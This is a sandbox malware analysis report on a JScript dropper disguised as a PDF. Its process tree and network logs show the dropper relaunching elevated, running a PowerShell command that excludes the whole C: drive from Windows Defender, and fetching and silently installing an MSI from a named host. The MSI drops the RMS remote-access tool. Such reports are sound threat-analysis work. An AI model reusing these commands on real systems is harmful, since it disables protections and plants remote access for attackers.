Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
U0443.pdf.js

Overview

General Information

Sample name:U0443.pdf.js
renamed because original name is a hash value
Original sample name: .pdf.js
Analysis ID:1631720
MD5:625aad96a4f46cd90d07c3214c1128ed
SHA1:370b1c58d533b3c895b6c2a5f0b98c61bbe68838
SHA256:71d764e79cf0b6bcd64360f1dc88364bf445080cf0f6e21923285e323994ce24
Tags:jsuser-pr0xylife
Infos:

Detection

RMSRemoteAdmin
Score:100
Range:0 - 100
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Parent Double Extension File Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected RMS RemoteAdmin tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 8068 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 6308 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 2224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 4952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 6460 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1828 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
        • chrome.exe (PID: 5832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,8986519759331592516,17312955933215486505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3092 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • wscript.exe (PID: 7340 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 3264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 4924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
      • cmd.exe (PID: 6644 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\putty.msi" /qn MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • msiexec.exe (PID: 2728 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\putty.msi" /qn MD5: E5DA170027542E25EDE42FC54C929077)
    • wscript.exe (PID: 1160 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 3752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8160 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • wscript.exe (PID: 1780 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 4128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floatnightlife.com/pdf.pdf?sn=22 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • svchost.exe (PID: 7940 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3328 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msiexec.exe (PID: 2368 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6312 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 85876F97EED0B7EDCFF1192CE7DC76A0 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • rfusclient.exe (PID: 3452 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" -msi_copy "C:\Users\user\AppData\Roaming\putty.msi" MD5: 808E5776D6082C5E319E511D4FA46E4F)
    • rutserv.exe (PID: 6580 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rutserv.exe (PID: 1296 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rutserv.exe (PID: 508 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start MD5: 182AB684EC5C25A535814BC60ECFD87C)
  • rutserv.exe (PID: 1312 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -service MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rutserv.exe (PID: 5760 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" -firewall MD5: 182AB684EC5C25A535814BC60ECFD87C)
    • rfusclient.exe (PID: 8168 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" MD5: 808E5776D6082C5E319E511D4FA46E4F)
      • rfusclient.exe (PID: 3468 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray MD5: 808E5776D6082C5E319E511D4FA46E4F)
    • rfusclient.exe (PID: 3620 cmdline: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray MD5: 808E5776D6082C5E319E511D4FA46E4F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeJoeSecurity_RMSRemoteAdminYara detected RMS RemoteAdmin toolJoe Security
    C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeMALWARE_Win_RemoteUtilitiesRATRemoteUtilitiesRAT RAT payloadditekSHen
    • 0x334cd4:$s1: rman_message
    • 0x3e62cc:$s3: rms_host_
    • 0x3e6c84:$s3: rms_host_
    • 0x7a9dbc:$s4: rman_av_capture_settings
    • 0x3ed450:$s7: _rms_log.txt
    • 0x452230:$s8: rms_internet_id_settings
    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeJoeSecurity_RMSRemoteAdminYara detected RMS RemoteAdmin toolJoe Security
      C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeMALWARE_Win_RemoteUtilitiesRATRemoteUtilitiesRAT RAT payloadditekSHen
      • 0x3a610c:$s1: rman_message
      • 0x4751b0:$s3: rms_host_
      • 0x475b68:$s3: rms_host_
      • 0x832b0c:$s4: rman_av_capture_settings
      • 0x87e3fc:$s5: rman_registry_key
      • 0x87e448:$s5: rman_registry_key
      • 0x54b814:$s6: rms_system_information
      • 0x2f9510:$s7: _rms_log.txt
      • 0x50ad08:$s8: rms_internet_id_settings

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000027.00000000.2412845653.00000000015F6000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_RMSRemoteAdminYara detected RMS RemoteAdmin toolJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        39.0.rfusclient.exe.bb0000.0.unpackJoeSecurity_RMSRemoteAdminYara detected RMS RemoteAdmin toolJoe Security
          39.0.rfusclient.exe.bb0000.0.unpackMALWARE_Win_RemoteUtilitiesRATRemoteUtilitiesRAT RAT payloadditekSHen
          • 0x334cd4:$s1: rman_message
          • 0x3e62cc:$s3: rms_host_
          • 0x3e6c84:$s3: rms_host_
          • 0x7a9dbc:$s4: rman_av_capture_settings
          • 0x3ed450:$s7: _rms_log.txt
          • 0x452230:$s8: rms_internet_id_settings

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6308, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2224, ProcessName: powershell.exe
          Sigma detected: Script Initiated Connection to Non-Local Network
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 217.21.85.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6308, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49691
          Sigma detected: Suspicious Parent Double Extension File Execution
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, CommandLine|base64offset|contains: ^^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8068, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ProcessId: 6308, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", ProcessId: 8068, ProcessName: wscript.exe
          Sigma detected: Communication To Uncommon Destination Ports
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 194.180.158.11, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: , Initiated: true, ProcessId: , Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49749
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6308, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2224, ProcessName: powershell.exe
          Sigma detected: Script Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 217.21.85.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6308, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49691
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U0443.pdf.js", ProcessId: 8068, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\U0443.pdf.js" /elevated, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6308, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2224, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc, ProcessId: 7940, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-07T14:49:34.510714+010020283713Unknown Traffic192.168.2.549691217.21.85.207443TCP
          2025-03-07T14:49:34.512892+010020283713Unknown Traffic192.168.2.549692217.21.85.207443TCP
          2025-03-07T14:49:47.446145+010020283713Unknown Traffic192.168.2.549703217.21.85.207443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: U0443.pdf.jsVirustotal: Detection: 9%Perma Link
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB3AE0 rmsEncRsaPublicEncrypt,memcpy,39_2_6AFB3AE0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB42D0 rmsEncRsaPrivateEncrypt,memcpy,memcpy,memcpy,39_2_6AFB42D0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB38C0 rmsEncDecryptData,39_2_6AFB38C0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB4000 rmsEncRsaPublicDecrypt,memcpy,memcpy,memcpy,39_2_6AFB4000
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB45A0 rmsEncInitSimpleEncryption,memcpy,memcpy,39_2_6AFB45A0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB3760 rmsEncEncryptData,39_2_6AFB3760
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6AFB3D30 rmsEncRsaPrivateDecrypt,memcpy,memcpy,memcpy,39_2_6AFB3D30
          Source: https://floatnightlife.com/pdf.pdf?sn=22HTTP Parser: No favicon
          Source: https://floatnightlife.com/pdf.pdf?sn=22HTTP Parser: No favicon
          Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
          Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeFile created: C:\ProgramData\Remote Manipulator System\install.log
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\licenses.txt
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf
          Source: unknownHTTPS traffic detected: 150.171.27.254:443 -> 192.168.2.5:49690 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49691 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 217.21.85.207:443 -> 192.168.2.5:49692 version: TLS 1.2
          Source: C:\Windows\System32\msiexec.exeFile opened: z:
          Source: C:\Windows\System32\msiexec.exeFile opened: x:
          Source: C:\Windows\System32\msiexec.exeFile opened: v:
          Source: C:\Windows\System32\msiexec.exeFile opened: t:
          Source: C:\Windows\System32\msiexec.exeFile opened: r:
          Source: C:\Windows\System32\msiexec.exeFile opened: p:
          Source: C:\Windows\System32\msiexec.exeFile opened: n:
          Source: C:\Windows\System32\msiexec.exeFile opened: l:
          Source: C:\Windows\System32\msiexec.exeFile opened: j:
          Source: C:\Windows\System32\msiexec.exeFile opened: h:
          Source: C:\Windows\System32\msiexec.exeFile opened: f:
          Source: C:\Windows\System32\msiexec.exeFile opened: b:
          Source: C:\Windows\System32\msiexec.exeFile opened: y:
          Source: C:\Windows\System32\msiexec.exeFile opened: w:
          Source: C:\Windows\System32\msiexec.exeFile opened: u:
          Source: C:\Windows\System32\msiexec.exeFile opened: s:
          Source: C:\Windows\System32\msiexec.exeFile opened: q:
          Source: C:\Windows\System32\msiexec.exeFile opened: o:
          Source: C:\Windows\System32\msiexec.exeFile opened: m:
          Source: C:\Windows\System32\msiexec.exeFile opened: k:
          Source: C:\Windows\System32\msiexec.exeFile opened: i:
          Source: C:\Windows\System32\msiexec.exeFile opened: g:
          Source: C:\Windows\System32\msiexec.exeFile opened: e:
          Source: C:\Windows\System32\msiexec.exeFile opened: c:
          Source: C:\Windows\System32\msiexec.exeFile opened: a:

          Software Vulnerabilities

          barindex
          JavaScript source code contains functionality to generate code involving a shell, file or stream
          Source: U0443.pdf.jsArgument value : ['"Shell.Application"']
          Source: U0443.pdf.jsArgument value : ['"Shell.Application"', '"WScript.Shell"']
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 4x nop then push esi39_2_6B376B90
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 4x nop then push esi39_2_6B3774B0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 4x nop then sub esp, 1Ch39_2_6B37BEB0
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 4x nop then push esi39_2_6B376AD0

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 217.21.85.207 443
          Connects to many ports of the same IP (likely port scanning)
          Source: global trafficTCP traffic: 194.180.158.11 ports 5651,8080,0,8,80,5655
          Source: global trafficTCP traffic: 192.168.2.5:49730 -> 194.180.158.11:8080
          Source: global trafficTCP traffic: 192.168.2.5:49731 -> 5.181.158.121:5651
          Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
          Source: Joe Sandbox ViewASN Name: IPPLANET-ASIL IPPLANET-ASIL
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49692 -> 217.21.85.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 217.21.85.207:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49691 -> 217.21.85.207:443
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
          Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
          Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
          Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
          Source: unknownTCP traffic detected without corresponding DNS query: 150.171.27.254
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 5.181.158.121
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: unknownTCP traffic detected without corresponding DNS query: 194.180.158.11
          Source: global trafficHTTP traffic detected: GET /rms.msi?sn=65 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: floatnightlife.com
          Source: global trafficHTTP traffic detected: GET /rms.msi?sn=65 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: floatnightlife.com
